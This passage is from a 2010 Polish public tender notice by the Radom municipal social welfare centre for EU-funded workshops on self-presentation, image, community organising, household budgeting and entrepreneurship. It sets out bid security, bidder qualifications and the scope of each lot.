Sporządzona dokumentacja powinna być odpowiednio oznaczone logotypami Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki oraz logo Miejskiego Ośrodka Pomocy Społecznej w Radomiu, zgodnie z wytycznymi z dnia 4 lutego 2009 roku Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego- podanymi na stronie internetowej www.efs.gov.pl .
12 Wykonawca zobowiązany jest do potwierdzenia uczestnictwa w warsztacie w formie dyplomu, certyfikatu, zaświadczenia wydawanego uczestnikom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca zobowiązany jest do wniesienia wadium przed upływem terminu składania ofert.
2.Wysokość wadium wynosi: 
na I część zamówienia: 1.000,- zł (słownie: jeden tysiąc złotych),
na II część zamówienia: 600,- zł (słownie: sześćset złotych),
na pozostałe części zamówienia Zamawiający nie wymaga wniesienia wadium.
3.Wadium może być wniesione w jednej z następujących form:
a)pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 oraz z 2002r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824 oraz z 2004r. Nr 145, poz. 1537.  zawsze poręczen ęczen iem pieniężnym protestów).
4.W przypadku wadium wnoszonego w pieniądzu należy je przelać na rachunek bankowy zamawiającego:

MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W RADOMIU 
PEKAO S.A. II Oddział w Radomiu
31 1240 3259 1111 0000 2989 0457
Za wadium skutecznie wniesione przelewem na wyżej wskazany rachunek bankowy, zamawiający uznaje wadium, które najpóźniej przed upływem terminu otwarcia ofert będzie znajdować się na rachunku zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego w/w rachunek.
UWAGA: 
Pod rygorem odrzucenia oferty niedopuszczalna jest wpłata gotówki celem wniesienia wadium w formie pieniężnej zarówno jeżeli zostanie dokonana w kasie zamawiającego jak również jeżeli zostanie dokonana w banku PEKAO S.A. wprost na ww. rachunek.
5.W przypadku, gdy wadium zostanie wniesione przelewem, wykonawca dołącza do oferty oryginał bądź kserokopię przelewu. W pozostałych przypadkach (bezgotówkowe formy wniesienia wadium) wymagane jest dołączenie do oferty oryginału dokumentu wystawionego na rzecz Zamawiającego. Na dowodzie przelewu należy zaznaczyć, jakiego przetargu dotyczy wadium.
6.W przypadku wnoszenia wadium w postaci poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, wykonawca winien przedłożyć dokument poręczenia wystawiony przez poręczyciela.
7.W przypadku wniesienia wadium w gwarancjach bankowych wykonawca winien przedłożyć pisemną gwarancję udzieloną przez bank, zgodnie z wymaganiami określonymi przez prawo bankowe, obowiązującą przez okres związania ofertą, określony w SIWZ.
8.W przypadku wniesienia wadium w gwarancjach ubezpieczeniowych wykonawca winien przedłożyć pisemną gwarancję udzieloną przez firmę ubezpieczeniową, obowiązującą przez okres związania ofertą, określony w SIWZ.
9.W przypadku wniesienia wadium w poręczeniach udzielonych przez podmioty, o których mowa, w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.) wykonawca winien przedłożyć dokument poręczenia wystawiony przez poręczyciela, obowiązujące przez okres związania ofertą, określony w SIWZ.
10.Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy):
a)ustalać beneficjenta gwarancji, tj. Miejski Ośrodek Pomocy Społecznej w Radom, ul. Limanowskiego 134,
b)określać kwotę gwarantowaną w zł. (ustaloną w SIWZ),
c)określać termin ważności (wynikający z SIWZ),
d)określać przedmiot gwarancji  (wynikający z SIWZ),
być gwarancją nie odwoływalną, bezwarunkową, płatną na każde żądanie Zamawiającego.
11.Z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium jeżeli wystąpią przesłanki opisane w art. 46  ust 4a i 5 ustawy Prawo zamówień publicznych, w szczególności uprawnienie Zamawiającego do zatrzymania wadium wraz z odsetkami jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
12.Okoliczności i zasady zwrotu wadium oraz jego przepadku określa art. 46 ustawy Pzp. Zamawiający zwracając wadium zwróci jednocześnie oryginał dokumentu wadium. 
13.W dokumentacji przetargowej zostanie poświadczona za zgodność z oryginałem kserokopia zwróconego dokumentu wadium wraz z adnotacją o podstawie i terminie zwrotu oryginału.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o oświadczenie, o którym mowa w IX.1.1.SIWZ. Z treści załączonego oświadczenia musi wynikać jednoznacznie, iż Wykonawca spełnił w.w warunki.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku wykazanie, że Wykonawca posiada doświadczenie w prowadzeniu warsztatów, co najmniej 200 godzin łącznie.

Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o oświadczenie, o którym mowa w IX.1.1. i dokumenty wyszczególnione w rozdz. IX. SIWZ. Z treści załączonego oświadczenia i dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił w.w warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku dysponowania odpowiednim potencjałem technicznym wykazanie, że Wykonawca w zakresie niżej wymienionych części zamówienia dysponuje:
a)w zakresie części I zamówienia: co najmniej 5 lokalami dostosowanymi do potrzeb realizacji działań grupowych (grupy 10-15 osób), wyposażonymi w podstawowe sprzęty biurowe (krzesła, biurka, itp.), gdzie co najmniej 1 lokal dostosowany będzie do potrzeb osób niepełnosprawnych (3 osoby mają problem z poruszaniem się); 
b)w zakresie części II zamówienia: co najmniej 3 lokalami dostosowanymi do potrzeb realizacji działań grupowych (grupy 10-15 osób), wyposażonymi w podstawowe sprzęty biurowe (krzesła, biurka, itp.), gdzie co najmniej 1 lokal dostosowany będzie do potrzeb osób niepełnosprawnych (1 osoba ma problem z poruszaniem się);
c)w zakresie części III zamówienia: co najmniej 1 lokalem dostosowanym do potrzeb realizacji działań grupowych (grupy 10-15 osób), wyposażonymi w sprzęty kuchenne umożliwiające zajęcia praktyczne (kuchenki, narzędzia kuchenne, stoły itp);
d)w zakresie części IV zamówienia: co najmniej 1 lokalem dostosowanym do potrzeb realizacji działań grupowych (grupy 10-15 osób), wyposażonym w podstawowe sprzęty biurowe (krzesła, biurka, itp.). 
Wszystkie lokale, z których będą korzystać uczestnicy muszą spełniać wymogi wynikające z przepisów BHP, sanitarnych i p.poż.
3.2. Zamawiający uzna za spełnienie warunku osobami zdolnymi do wykonania zamówienia wykazanie, że Wykonawca w zakresie niżej wymienionych części zamówienia dysponuje:
a)w zakresie części I zamówienia: min. 5 osobami z wykształceniem wyższym, posiadającymi uprawnienia pedagogiczne, z których: 
co najmniej 2 osoby posiadają doświadczenie zawodowe w zakresie prowadzenia warsztatów autoprezentacji, oraz 
co najmniej 3 osoby posiadają doświadczenie zawodowe w zakresie prowadzenia warsztatów kreowania wizerunku lub i warsztatów wizażu;
b)w zakresie części II zamówienia: - min. 3 osobami z wykształceniem wyższym, posiadającymi uprawnienia pedagogiczne oraz doświadczenie w prowadzeniu warsztatów lub i kursów lub i wykładów z zakresu: 
organizowania środowiska lokalnego - co najmniej 1 osoba, 
gospodarowania budżetem domowym lub i przedsiębiorczości - co najmniej 2 osoby;
c)w zakresie części III zamówienia: min. 1 osobą posiadającą co najmniej średnie wykształcenie o kierunku technik kucharz i ponad 3-letnie doświadczenie zawodowe.
d)w zakresie części IV zamówienia: min. 5 osobami z wykształceniem wyższym, z których: 
min. 1 osoba z wykształceniem w kierunku: dietetyka lub medycyna lub pielęgniarstwo; 
min. 1 osoba posiadająca uprawnienia do prowadzenia szkoleń z zakresu udzielania pierwszej pomocy i bhp lub osoba posiadająca kwalifikacje ratownika medycznego,
min. 1 osoba posiadającą wykształcenie w kierunku: psycholog lub prawnik lub doradca zawodowy lub osoba z ukończonymi studiami podyplomowymi w kierunku doradca zawodowy,
min. 1 osoba posiadającą wykształcenie: prawnicze lub administracyjne lub medyczne;
wszystkie osoby winny mieć doświadczenie zawodowe w prowadzeniu zajęć grupowych lub i prelekcji lub i wykładów
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o oświadczenie, o którym mowa w IX.1.1. i dokumenty wyszczególnione w rozdz. IX. SIWZ. Z treści załączonego oświadczenia i dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił w.w warunki.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie powyższego warunku  wykazanie, że Wykonawca w zakresie niżej wymienionych części zamówienia dysponuje:
a)w zakresie części I zamówienia: min. 5 osobami z wykształceniem wyższym, posiadającymi uprawnienia pedagogiczne, z których: 
co najmniej 2 osoby posiadają doświadczenie zawodowe w zakresie prowadzenia warsztatów autoprezentacji, oraz 
co najmniej 3 osoby posiadają doświadczenie zawodowe w zakresie prowadzenia warsztatów kreowania wizerunku lub i warsztatów wizażu;
b)w zakresie części II zamówienia: - min. 3 osobami z wykształceniem wyższym, posiadającymi uprawnienia pedagogiczne oraz doświadczenie w prowadzeniu warsztatów lub i kursów lub i wykładów z zakresu: 
organizowania środowiska lokalnego - co najmniej 1 osoba, 
gospodarowania budżetem domowym lub i przedsiębiorczości - co najmniej 2 osoby;
c)w zakresie części III zamówienia: min. 1 osobą posiadającą co najmniej średnie wykształcenie o kierunku technik kucharz i ponad 3-letnie doświadczenie zawodowe.
d)w zakresie części IV zamówienia: min. 5 osobami z wykształceniem wyższym, z których: 
min. 1 osoba z wykształceniem w kierunku: dietetyka lub medycyna lub pielęgniarstwo; 
min. 1 osoba posiadająca uprawnienia do prowadzenia szkoleń z zakresu udzielania pierwszej pomocy i bhp lub osoba posiadająca kwalifikacje ratownika medycznego,
min. 1 osoba posiadającą wykształcenie w kierunku: psycholog lub prawnik lub doradca zawodowy lub osoba z ukończonymi studiami podyplomowymi w kierunku doradca zawodowy,
min. 1 osoba posiadającą wykształcenie: prawnicze lub administracyjne lub medyczne;
wszystkie osoby winny mieć doświadczenie zawodowe w prowadzeniu zajęć grupowych lub i prelekcji lub i wykładów.

Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o oświadczenie, o którym mowa w IX.1.1. i dokumenty wyszczególnione w rozdz. IX. SIWZ. Z treści załączonego oświadczenia i dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił w.w warunki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o oświadczenie, o którym mowa w IX.1.1.SIWZ. Z treści załączonego oświadczenia musi wynikać jednoznacznie, iż Wykonawca spełnił w.w warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy wykonawca składa ofertę przez ustanowionego pełnomocnika;
W przypadku podmiotów występujących wspólnie (powołanie konsorcjum) pełnomocnictwo, o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia 
Kopie dokumentów załączonych do oferty dotyczące tych podmiotów są wówczas poświadczane za zgodność z oryginałem przez te podmioty, zgodnie z zapisem rozdziału XIV.8.SIWZ.
Potwierdzenie wpłaty wadium (w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem) lub w przypadku wadium wnoszonego w formie bezgotówkowej - dokument wystawiony na rzecz zamawiającego (w formie oryginału)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mops.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Radomiu reprezentowany przez Dyrektora Ośrodka w Radomiu ul. Limanowskiego 134, 26-600 Radom..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2010 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Radomiu, ul. Limanowskiego 134, 26-600 Radom - sekretariat Zamawiającego - pok. 003.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest świadczenie usług z zakresu warsztatów i prelekcji prowadzonych na rzecz uczestników (Beneficjentów Ostatecznych) projektu systemowego pt.: Aktywność szansą na lepsze jutro realizowanego w ramach Poddziałania 7.1.1 - Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, Działania 7.1 Priorytetu VII Programu Operacyjnego Kapitał Ludziki. Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług z zakresu:
1.1.Warsztatów autoprezentacji dla 10 grup liczących od 10 do 15 osób, po 16 godzin w łącznym wymiarze 160 godzin. 
Warsztaty powinny obejmować: 14 godzin zajęć praktycznych i 2 godziny teoretycznych (2 spotkania po 8 godzin).
Warsztaty mają na celu m.in.:
przygotowanie uczestników do stworzenia profesjonalnego imagu
budowanie integracji pomiędzy uczestnikami
weryfikacja samooceny osoby w zakresie jej mocnych i słabych stron 
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Budowanie integracji
2)Autoprezentacja osoby - jej dokonania i oczekiwania związane z uczestniczeniem w zajęciach
3)Samopoznanie mocnych stron osoby i jej relacji społecznych.
4)Weryfikacja samooceny osoby w zakresie jej mocnych i słabych stron
5)Podstawowe umiejętności komunikacyjne z otoczeniem społecznym
6)Zasady skutecznej komunikacji - umiejętność aktywnego słuchania 
7)Zakłócenia w komunikacji - czynniki powodujące zakłócenia.
8)Komunikacja niewerbalna
9)Autoprezentacja
10)Wizaż
2.Warsztatów kreowania wizerunku dla 13 grup liczących od 10-15 osób po 16 godzin, 
w łącznym wymiarze 208 godzin.
Warsztaty powinny obejmować: 14 godzin zajęć praktycznych i 2 godziny zajęć teoretycznych (2 spotkania po 8 godzin).
Warsztaty polegać będą na udzielaniu porad w zakresie kreowania wizerunku poprzez wygląd zewnętrzny (higienę osobistą, ubiór, fryzurę, makijaż, dodatki) i mają na celu naukę uczestników m.in. w zakresie:
lepszej prezentacji osób,
odpowiedniej prezentacji osoby bądź osób w danej sytuacji,
konieczności wprowadzenia identyfikacji wizualnej wizerunku poszczególnych osób w danym segmencie struktur organizacji i firm.
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Podstawowe zasady kreowania wizerunku:
Czy jest i skąd pochodzi świadomość własnego wizerunku?
Elementy składowe wizerunku
Struktura skuteczności komunikatów wizerunku
Wizerunek mentalny i wizerunek fizyczny - prawidłowe rozwiązania
Analiza osoby - aspekty doboru garderoby, kolorystyki, dodatków, fryzury, obuwia itp.
Świadome posługiwanie się elementami wizerunku jako czynnikami decydującymi i ułatwiającymi komunikację
Podstawowe zasady doboru garderoby i elementów prawidłowego wizerunku
Garderoba na dzień i na wieczór - zasady doboru
2)Makijaż - dopełnienie wizerunku
3)Szczegóły męskiego wizerunku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia świadczenie usług z zakresu:
1. Warsztatów organizowania środowiska lokalnego dla 3 grup od 10 do 15 osób, po 30 godzin w łącznym wymiarze 90 godzin. Warsztaty powinny obejmować: 16 godzin zajęć praktycznych i 14 godzin zajęć teoretycznych. (5 spotkań po 6 godzin).
Warsztaty mają na celu m.in.:
zwiększenie umiejętności uczestników w zakresie badań problemów występujących w społecznościach lokalnych,
zwiększenie wiedzy uczestników na temat społeczności lokalnej, jej rozwoju oraz znaczenia, jakie odgrywa w życiu człowieka,
zwiększenie wiedzy uczestników na temat samopomocy, działań obywatelskich ich rozwoju oraz znaczenia, jakie odgrywają w życiu człowieka,
zwiększenie wiedzy uczestników z zakresu metody animacji społecznej, roli zadań animatorki społecznej w grupach oraz społeczności lokalnej.
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Diagnoza problemów:
Co warto wiedzieć o mieszkańcach?
Cechy społeczno - demograficzne członków danej społeczności.
Identyfikacja znaczących osób i grup w swojej społeczności
Problem i potrzeba
Wygenerowanie problemów występujących w ich społecznościach 
Badanie potrzeb i problemów
Analiza wybranego problemu - drzewo problemów i drzewo celów
2)Społeczność lokalna i jej rozwój
3)Działania samopomocowe i obywatelskie
4)Animator w społeczności lokalnej 
5)Wolontariat w środowisku lokalnym

2.Warsztatów racjonalnego gospodarowania budżetem domowym dla 6 grup (od 10 do 15 osób) po 16 godzin dla każdej z grup, w łącznym wymiarze 96 godzin. 
Warsztaty powinny obejmować 8 godzin zajęć praktycznych i 8 godzin zajęć teoretycznych (2 spotkania po 8 godzin). 
Warsztaty mają na celu m.in.:
przygotowanie uczestników do poszerzenia swojej wiedzy z zakresu efektywnego gospodarowania budżetem domowym,
przybliżenie zasad systematycznego planowania i podsumowywania budżetowego celem kontrolowania stanu domowych finansów,
umiejętne zestawienie przychodów i planowanych wydatków, które pozwolą na przeanalizowanie struktury dokonywanych zakupów i ustaleniu ich hierarchii i możliwości ich ponoszenia. 
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Pojęcie budżetu i jego zastosowanie:
Przybliżenie pojęcia budżetu i celów jego konstruowania.
Omówienie różnić i podobieństw pomiędzy budżetem państwa, firmy a budżetem domowym.
Metody tworzenia budżetu i jego przystosowanie do skali gospodarstwa domowego.
Dlaczego warto kontrolować wydatki? Jak planować i systematyzować koszty?
Co to jest deficyt budżetowy? Jak go uniknąć i pokryć kiedy już powstanie?
2)Budżet domowy:
Cel tworzenia budżetu domowego
Adaptacja podstawowych zasad ekonomii do warunków domowych.
Metody tworzenia zestawień. Wady i zalety różnych metod i sposobów ich prowadzenia
Analiza budżetu. Jak czytać wyniki i podsumowania? Jak podejmować decyzje na ich podstawie?
Monitorowanie wydatków.
3)Organizacja domowego budżetu:
Źródła dochodów
Rodzaje wydatków
Racjonalne planowanie
Budowanie modelu osobistego budżetu
4)Oszczędzanie na wyznaczone cele:
Plan zakupu dóbr trwałego użytku
Gromadzenie zasobów na wydatki okazjonalne
Tworzenie kapitału rezerwowego
Zasada 10-28-83 czyli nie odkładaj decyzji na później. 
5)Jak rozsądnie wydawać pieniądze?
Jak zbudować strukturę wydatków?
Co i gdzie kupować?
Jak czytać ceny?
Jak podejmować decyzje zakupowe?

3.Warsztatów przedsiębiorczości dla 2 grup liczących od 10 do 15 osób, po 24 godziny 
w łącznym wymiarze 48 godzin. Warsztaty powinny obejmować: 16 godzin zajęć praktycznych i 8 godzin zajęć teoretycznych. (3 spotkania po 8 godzin).
Warsztaty mają na celu m.in.:
przygotowanie uczestników szkolenia do uruchomienia i prowadzenia dokumentacji biurowej i księgowej,
przygotowanie do praktycznego wykorzystania posiadanych przez uczestników możliwości w celach zarobkowych.
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Zasady prowadzenia działalności gospodarczej:
Źródła prawa działalności gospodarczej
Podejmowanie indywidualnej działalności gospodarczej
Formy prawne małych firm
